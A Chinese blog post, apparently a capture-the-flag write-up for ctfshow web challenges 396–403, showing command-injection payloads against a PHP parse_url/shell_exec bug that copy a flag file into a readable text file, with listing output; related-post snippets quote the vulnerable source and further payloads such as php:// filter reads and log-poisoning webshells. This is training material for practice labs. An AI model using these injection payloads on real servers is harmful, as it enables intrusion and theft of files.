ctfshow-web入门-其他分类(部分wp)-396-403

最新推荐文章于 2024-06-23 16:17:26 发布
原创 最新推荐文章于 2024-06-23 16:17:26 发布 · 692 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

这篇博客展示了通过URL参数执行Linux命令,如`cat`,来读取和写入文件,从而获取`flag`的过程。内容涉及到Web服务器的安全性和文件系统交互。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

396

传入

?url=s;cat ls -al > 1.txt

得到 flag 位置

total 24
drwxrwxrwx    1 www-data www-data      4096 Jan 16 06:31 .
drwxr-xr-x    1 root     root          4096 Oct 31  2019 ..
-rw-r--r--    1 www-data www-data         0 Jan 16 06:31 1.txt
-rw-r--r--    1 www-data www-data       275 Jan 16 06:28 fl0g.php
-rw-r--r--    1 www-data www-data       398 Jan 15 09:21 index.php
-rw-r--r--    1 www-data www-data         1 Jan 16 06:31 s

传入

?url=s;cat fl0g.php > 1.txt

访问 1.txt 得到flag

397 - 402

同 396

403

Payload

http://192.168.31.75/1;cat fl0g.php > 1.txt
ctfshow其他
qq_45655564的博客
08-31 670
396 <?php error_reporting(0); if(isset($_GET['url'])){ $url = parse_url($_GET['url']); shell_exec('echo '.$url['host'].'> '.$url['path']); }else{ highlight_file(__FILE__); } payload url=http://`tac fl*`/var/www/html/1.txt 397 error_r
CTFShow-WEB入门篇命令执行详细Wp(29-40)_ctfshow-web入门篇详细wp(1)
2301_82056337的博客
05-07 1144
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察。
CTFSHOW其他篇
羽的博客
02-05 3080
web396、397、398、399、400、401 url=http://1/1;echo `ls`>a.txt url=http://1/1;echo `cat fl0g.php`>a.txt web402 payload:url=file://1/1;echo `cat fl0g.php`>a.txt web403 url=http://127.0.0.1/1;echo `cat fl0g.php`>a.txt
ctfshow web入门 其他 web396--web412
2301_81040377的博客
05-21 841
这里我们要调用cafe类里面的add方法,而检验完IP之后刚好会使用call_user_func进行函数的调用。这里的函数写的是将//和ctfshow进行一个拼接,那我们就可以使用一个换行进行绕过。这里说明了host必须是正常域名,我们就不能写命令了,只能用;还可以弹回显,直接不就用哦本地了,但是没影响直接打。对host过滤了分号,没影响。里面讲了危险函数的绕过。把http改成1就行。
ctfshow 其他
qq_45951598的博客
01-11 3439
web396、397、398、399、400、401 parse_url 绕过 源码 error_reporting(0); if(isset($_GET['url'])){ $url = parse_url($_GET['url']); shell_exec('echo '.$url['host'].'> '.$url['path']); }else{ highlight_file(__FILE__); } 这里没有什么限制直接绕过 payload一 ?url=http
CTFshow——其他
D.MIND 的博客
08-17 2226
396——parse_url() 需要加上绝对路径 /?url=http://ls;echo `ls`/var/www/html/2.txt /?url=http://ls;echo `cat f*`/var/www/html/3.txt 397——parse_url() 使用../迁移目录 /?url=http://;echo `cat f*`/../var/www/html/1.txt 398~401 通杀了… ?url=http://`cat f*`/../var/www/html/7.txt
CTFShow-WEB入门篇命令执行详细Wp(29-40)_ctfshow-web入门篇详细wp
2401_84281698的博客
05-12 1081
c=php://filter/read=convert.base64-encode/resource=flag.php #这里过滤了flag不要使用这一条没用 我只是都想测一遍用下面两个。对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。php://filter/read=convert.base64-encode/resource=flag.php #伪协议。
CTFShow-WEB入门--信息搜集详细Wp_ctfshow web
2401_84297944的博客
04-28 1140
F12。
最新CTFShow-WEB入门--信息搜集详细Wp_ctfshow web,2024年最新看这篇文章就行了
2401_84264244的博客
05-13 1064
index.phps。
ctfshow-web入门-爆破wp
m0_53567065的博客
11-01 1285
ctfshow-web入门-爆破wp
ctfshow web其他 web450--web460
最新发布
2301_81040377的博客
06-23 610
所以是能够回调到并且返回true的。代码没有变,但是没有回显flag。用php伪协议外带写入文件。
ctfshow 其他(持续更新)
Lum1n0us's Blog
08-13 1696
文章目录web396web397-401web402web403web404web405 web396 <?php error_reporting(0); if(isset($_GET['url'])){ $url = parse_url($_GET['url']); shell_exec('echo '.$url['host'].'> '.$url['path']); }else{ highlight_file(__FILE__); } 可以先在本地测试一下pars
[CTFSHOW]CTFSHOW-其他WP
Y4tacker的博客
02-10 3320
文章目录说在前面Web396(下面其实有通杀的但是得多试试其他的)Web397-Web401Web402We4b03Web404web405Web406Web407Web408Web409web410web411web412web413web414web415web416Web417web418web419web420web421-422web423web424-web431web432web433web434web435-436web437-438web439-440web441web442web443w
CTFshow web-web3 WP
qq_45427131的博客
05-11 775
CTFshow Web-Web3 文件包含+命令执行(伪协议) Php://filter/read=convert.base64-encode/resource=文件名 用php伪协议读取经过base64加密之后的文件 php://input php://input可以访问请求的原始数据的只读流,将请求的数据当作php代码执行。当传入的参数作为文件名打开时,可以将参数设为php://input,同时post想设置的文件内容,php执行时会将post内容当作文件内容。 注:当enctype=”multipa
Ctfshow web-web7 WP
qq_45427131的博客
05-12 498
首先讲一下数据库的判断 基础知识: select ascii(substr(database(),1,1))=119 ; 上面这段话的意思,可以分布理解 1、 首先是ascii()函数 , 熟悉mysql的应该知道,这是查询字符ascii码的 2、A的ascii码是65 a的ascii码是97 3、Substr()的函数作用是截取,有点类似于limit的作用 Substr(需要截取的字符串,开始位置,截取长度) 4、举个例子,当前我选中mysql数据库,尝试用select substr
CtfShow web-web5 WP
qq_45427131的博客
05-11 252
首先看到的是代码 代码中打红框的一段是要重点关注的 1、 GET方式,分别将收到的v1 v2 赋值给v1 v2 2、 If判断 isset判断是都有值,变量是否设置值 3、 第二个if是判断v1的值是不是md5,ctype_alpha 判断变量是不是有英文字母,因为md5肯定是有英文字母的 4、 第三个if是判断v2的值是不是纯数字 5、 第四个if用于判断v1的值是不是等于v2 ,在md5中0e开头的值,默认是相等的,v1是字符 v2是数字,可以理解成md5碰撞 举个例子 QNKCDZO 和 24061
CTFShow-WEB入门-信息收集 WP
PP Jun的博客
08-09 603
文章目录web1web2web3web4web5web6web7web8web9web10web11web12web13web14web15web16web17web18web19web20 web1 直接查看源码 web2 直接在url前加:view-source 或 ctrl+u web3 抓包,查看响应头 web4 1.在url后添加/robots.txt 2.访问/flagishere.txt web5 1.在url后添加/index.phps 结果:下载一个文件 2.将文件后缀改为tx
CTFshow web AK赛wp
HoAd'blog
01-26 636
CTFshow WEB AK赛ak赛 wp签到_观己web1_观字web2_观星web3_观图web4_观心总结 ak赛 wp 签到_观己 正则匹配过滤了php,且大小写不敏感,后面又有include函数,已经是对php的伪协议的一个考点。 php被过滤,我们可以用data://伪协议 发现allow_url_include没有开启,还得另寻他法。做题的时候没想到有日志包含,还是题做得太少了。 payload:file=/var/log/nginx/access.log 通过将一句话木马写入到UA中 &
Ctfshow web入门-web35-36 WP
qq_45427131的博客
05-17 466
web35 分析源码 发现对括号进行过滤,那么只能使用不带括号的函数,include $_POST[a]进行文件包含,看到能文件包含之后,可以尝试使用data协议命令执行,虽然data协议的命令执行写过很多遍了,但是还是再要提一下data:text/plain,<?php system("命令");?> 构造 payload: ?c=include%a$_POST[a]?> POST:a=data:text/plain,<?php system('tac fla*');?&gt
WeldPlus WP-80仿真软件精简版:入门指南
Weldplus上润数显表WP-80系列仿真软件是一种专门设计用于模拟WP-80系列数显表操作的软件工具,该软件为用户提供了一个虚拟的环境来学习和熟悉数显表的基本操作和参数设置。以下是与标题和描述中提及的知识点详细说明...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值